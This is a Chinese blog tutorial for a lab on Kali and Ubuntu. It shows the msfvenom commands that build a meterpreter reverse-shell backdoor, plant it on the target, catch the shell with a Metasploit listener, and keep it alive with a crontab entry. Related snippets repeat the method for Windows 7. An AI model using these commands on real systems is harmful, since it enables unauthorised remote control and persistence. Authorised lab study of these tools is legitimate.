保姆级攻略!Kali Linux 下 MSFvenom 程序利用全流程教学

于 2025-04-24 10:05:28 发布
阅读量659 收藏 11
点赞数 11
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cairo_A/article/details/147470828
版权

文章目录

一、实验

1.环境

(1)主机

表1 主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a


ip addr

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2. Kali Linux 进行 MSFvenom 程序利用

(1)创建后⻔程序

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.204.154 lport=4444 -f elf -o shell

(2) 配置ssh文件

vim .ssh/config


Host *
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa

(3)植⼊后⻔程序

scp shell root@192.168.204.143:/mnt

(4)Ubuntu查看权限

ls -l /mnt

(4)Ubuntu激活后⻔程序

chmod  a+x  /mnt/shell

(5)再次查看权限

ls -l /mnt

(6)Ubuntu后台执行

/mnt/shell &

(7)Kali Linux 连接后门

新开一个终端

msfconsole

(8)调用侦听模块

 use  exploit/multi/handler

(9)设置响应的IP地址

 set lhost 192.168.204.154

(10)设置响应的端口

set lport  4444

(11)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(12)运行

开启TCP反向侦听

run

(13)Ubuntu再次后台运行

(14)已连接

(15)查看用户权限及进程

用户

getuid

进程号

getpid

(16) 进入内核

shell

查看用户

whoami

查看路径

pwd

(17)退出

exit

3. 创建计划任务自动运行 MSFvenom 程序

(1)Ubuntu创建计划任务crontab程序

EDITOR=vim crontab -e

修改前:

修改后:

# m h  dom mon dow   command
* * * * * /bin/date>>/tmp/time.txt
* * * * * /mnt/shell &

(2)Kali Linux 连接后门

新开一个终端

msfconsole

(3)调用侦听模块

 use  exploit/multi/handler

(4)设置响应的IP地址

 set lhost 192.168.204.154

(5)设置响应的端口

set lport  4444

(6)设置载荷

set payload linux/x86/meterpreter/reverse_tcp

(7)运行

开启TCP反向侦听(已自动连接)

run

(8)运行在后台

background

(9) 查看会话

sessions

(10)切换会话

sessions 1

(11) 退出

exit

二、问题

1.在线加密解密

(1)查看DES 对称加密

http://www.jsons.cn/desencrypt

2.MSF 运行失败

(1) 报错

(2)原因分析

lhost地址错。

(3)解决方法

修改lhost地址。

已连接:

3.MobaXterm 连接Ubuntu 失败

(1) 报错

(2)原因分析

Ubuntu未设置root密码

(3)解决方法

sudo -i

passwd root

成功:

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
在这里插入图片描述

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
在这里插入图片描述

【信息收集】——8、FOFA搜索语法录
Fly_鹏程万里
04-12 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 Kali Linux是一个集成了许许多多的渗透测试工具的一款系统,也可以说是专门问渗透测试人员量身打造的一般,本小节就为大家来介绍一下kali当中有哪些用于信息收集...
一文通透——Kali Linux基础入门_kali linux 新手教程_kali linux jichurumen
2401_84970415的博客
05-13 2048
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
KALI LINXU简介
maniubip的博客
07-26 535
所以,如果你对网络安全感兴趣,不妨试试Kali Linux,开启你的黑客之旅吧!Kali Linux,基于Debian Linux,是一个开源的操作系统,由Offensive Security的团队开发。1. 丰富的工具库:Kali Linux拥有超过600个预装的安全工具,包括但不限于网络扫描器、密码破解工具、漏洞分析器等。记住,使用Kali Linux进行渗透测试时,一定要遵守法律法规,在授权后进行测试。3. 探索工具:花时间了解Kali Linux中的工具,了解它们的功能和使用方法。
Kali Linux 安装(非常详细),零基础入门到精通,看这一篇就够了
最新发布
chengxuyuanyy的博客
03-05 1817
物理机安装是指开机可以直接启动kali系统网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
渗透测试工具Kali Linux安装与使用
java后端开发的博客,不仅仅是后端开发
06-22 4万+
开始研究web渗透测试,本文是第一篇:Kali Linux工具安装,后面会更新实战类的一系列文章,感兴趣的童鞋可以关注我,一起学习吧!
网络安全: Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux
2401_84301227的博客
05-10 865
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
网络安全: Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux(5)
2401_83621004的博客
05-08 846
ip addr。
Android Termux 安装Kali Linuxkali Nethunter史诗详细教程
风云小虾米的博客
12-02 6万+
Termux 安装kali
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Kali Linux简介
永远是少年
05-16 2990
今天开始给大家介绍渗透测试相关知识,本文主要内容是Kali Linux简介。 一、什么是Kali Linux系统 二、Kali Linux系统的优势
Kali Linux的安装
青澜饮舟的博客
04-28 3142
安装Kali linux操作系统 1.1 虚拟机系统版本选择Debian或Ubuntu 1.2 名称和路径修改 1.3 配置磁盘大小 1.4 虚拟机环境配置 1.5 Kali系统安装,选择Graphic install 1.6 选择中文简体 1.7 中间选项默认和新手选项 1.8 配置网络及相关设置 1.9 设置主机名和密码 1.10 设置磁盘分区 1.11 ...
虚拟机以及kali linux的安装
热门推荐
qq_43613144的博客
05-27 7万+
虚拟机的使用就是为了运行linux系统。而kali linux则是基于linux系统之上的。先看看百度百科的介绍 Kali linux Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack...
kaLi linxu 安卓逆向虚拟机使用指南
qq_41155858的博客
07-17 1944
Kali linux 虚拟机,history比如想要查看有关frida使用过的命令会出现很多的命令,然后用!数字比如!17就能够执行对应的命令。
Kali Linux 简介
一分耕耘一分收获
08-06 7286
Kali Linux 是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计其安全性,而且功能完备,几乎包含了目前所有的热门工具。借助Kali Linux 我们能快速的,批量的去发现问题,减少了测试成本。 Kali Linux 发展历史如图 2021年最新版本的Kali 长这个样子 Kali Linux 特征 1.支持多种桌面环境,如GNOME,KDE,LXDE,XFCE等并且支持多种语言。 2.兼容Debian工具,一天至少和Debian资源库同步四次,使更..
kali Linux系统安装及基本配置
weixin_38467835的博客
10-07 6400
文章目录一、环境介绍二、目的三、步骤1.安装kali Linux2.配置kali Linux 一、环境介绍 kali Linux版本:2020.04(此版本进入远程桌面不会闪退) 虚拟机环境:VMware ESXI 6.0 二、目的 安装kali Linux操作系统 配置软件更新 配置SSH、XRDP服务 三、步骤 1.安装kali Linux 虚拟机配置中选择kali-linux-2020.4-installer-amd64.iso作为安装镜像,启动虚拟机进入安装界面,选择Graphical in
Kali Linux渗透测试实战 1.1
Conan
06-23 3127
1.1 Kali Linux简介 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升换代产品,从Kali开始,BackTrack将成为历史。 如果您没接触过BackTrack也没关系,我们从头开始了解Kali Linux。 按照官方网站的定义,Kali Linux是一个高渗透测试和安全审计Linux发行版。作为使用者,我简
kali Linux 系统安装教程
y521h125的博客
09-03 2万+
安装kali Linux需要利用到kali的镜像和VMware虚拟机,kali镜像和VMware推荐到官网下
如何利用Kali Linuxmsfvenom工具生成并利用Payload进行Windows 7系统的渗透测试?
10-30
在网络安全的学习和测试中,理解并实践渗透测试的基本步骤至关重要。要使用Kali Linuxmsfvenom生成并利用Payload对Windows 7系统进行渗透测试,首先需要熟悉Metasploit Framework。以下是详细的步骤: 参考资源链接:[Kali Linux攻击Win7实战指南](https://wenku.csdn.net/doc/88u1chx3m7) 1. 准备环境:确保你的Kali Linux系统已经安装了Metasploit Framework。如果你使用的是Kali的默认安装,那么Metasploit已经预装。 2. 配置目标系统:目标Windows 7系统需要能够接收外部命令。确保防火墙设置允许通信,如果是在实际环境中,请确保遵守相关法律和道德准则。 3. 使用msfvenom创建Payload:msfvenom是Metasploit中用于生成Payload的工具。通过以下命令生成一个Windows可执行文件的Payload: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali的IP地址> LPORT=<端口号> -f exe -o payload.exe ``` 请将`<Kali的IP地址>`和`<端口号>`替换为实际使用的IP和端口。 4. 运行Payload:将生成的`payload.exe`传输到Windows 7系统并执行。这将使目标系统尝试连接回Kali。 5. 设置监听器:在Kali Linux上,打开MSF控制台并设置一个监听器来捕获反向连接: ``` msfconsole use exploit/multi/handlers set payload windows/meterpreter/reverse_tcp set LHOST <Kali的IP地址> set LPORT <端口号> exploit ``` 确保设置的LHOST和LPORT与msfvenom命令中的参数一致。 6. 接收连接并操作:一旦Windows 7系统执行了`payload.exe`,你应该在Kali的MSF控制台中看到一个新的Meterpreter会话。此时,你可以执行各种命令来控制目标系统,如获取系统信息、上传文件、下载文件、键盘记录、屏幕监控等。 为了更深入地了解这些概念并掌握实际操作,建议参考《Kali Linux攻击Win7实战指南》。这份资料提供了从基础到实战的详细步骤,有助于初学者通过实战演练掌握网络攻防的关键知识。 参考资源链接:[Kali Linux攻击Win7实战指南](https://wenku.csdn.net/doc/88u1chx3m7)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值